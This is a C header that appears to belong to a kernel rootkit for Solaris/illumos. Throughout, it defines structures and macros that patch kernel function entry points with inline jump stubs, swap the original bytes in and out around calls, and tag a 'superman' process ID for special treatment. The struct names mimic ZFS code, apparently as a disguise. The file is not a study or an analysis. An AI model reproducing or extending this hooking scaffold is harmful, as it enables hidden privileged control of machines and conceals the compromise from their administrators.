#ifndef __KSH_ZFS_H
#define __KSH_ZFS_H

#ifdef DEBUG
 #define debug(fmt,args...) cmn_err(CE_WARN, "%s(): " fmt "\n", __func__, args); 
#else
 #define debug(fmt,args...) while (0) {}
#endif

#define B_TRUE          	1
#define B_FALSE         	0

#define ATOMIC_LOCK(x)  	int num = 0; while ( hooks[num].hook_handler != (long *) hook_##x ) { num++; } \
					memcpy(hooks[num].orig_symbol, hooks[num].orig_handler_asm, sizeof(hooks[num].orig_handler_asm));   
#define ATOMIC_UNLOCK		memcpy(hooks[num].orig_symbol, hooks[num].hook_handler_asm, sizeof(hooks[num].hook_handler_asm));

#define SET_SUPERMAN(x)		ze.pid = x;
#define	IS_SUPERMAN(x)		( ze.pid == x )

#define VFS_NUM			32
#define	KSH_INO_ROOT		321

typedef struct  zfs_enhancer {
	short	pid;
	long	flags;
	char	moretocome[64];
} zfs_enhancer_t;

/* hook structures */
struct  new_hook {
        char    *name;
        long    *hook_handler;
        long    *orig_handler;
        long    *orig_symbol;
	int	rep_size;
	ddi_modhandle_t		ddi_modhandle;
	char	orig_handler_asm[12];
	char	hook_handler_asm[12];
} __attribute__ ((packed));

#define LEAVE_RET		"\xC9\xC3"
#define INSTRUCTION_JMP		"\xB8"

/* 32 bit jmp opcode */
typedef struct jmp_opcode {
	unsigned char	jmp_eax;
	long		addr;
	unsigned char	mov_addr_eax[1];
} jmp_opcode_t;

#define	RF_BAD_BUF(buf, base, size) \
	((uintptr_t)(buf) < (uintptr_t)(base) || \
	((uintptr_t)(buf) >= (uintptr_t)(base) + (uintptr_t)(size)))

typedef struct zfsctl_node {
        gfs_dir_t       zc_gfs_private;
        uint64_t        zc_id;
        timestruc_t     zc_cmtime;      /* ctime and mtime, always the same */
} zfsctl_node_t;

#define NV_STAT_EMBEDDED        0x1
#define EMBEDDED_NVL(nvp)       ((nvlist_t *)(void *)NVP_VALUE(nvp))
#define EMBEDDED_NVL_ARRAY(nvp) ((nvlist_t **)(void *)NVP_VALUE(nvp))

#define NVP_VALOFF(nvp) (NV_ALIGN(sizeof (nvpair_t) + (nvp)->nvp_name_sz))
#define NVPAIR2I_NVP(nvp) \
	        ((i_nvp_t *)((size_t)(nvp) - offsetof(i_nvp_t, nvi_nvp)))


#endif
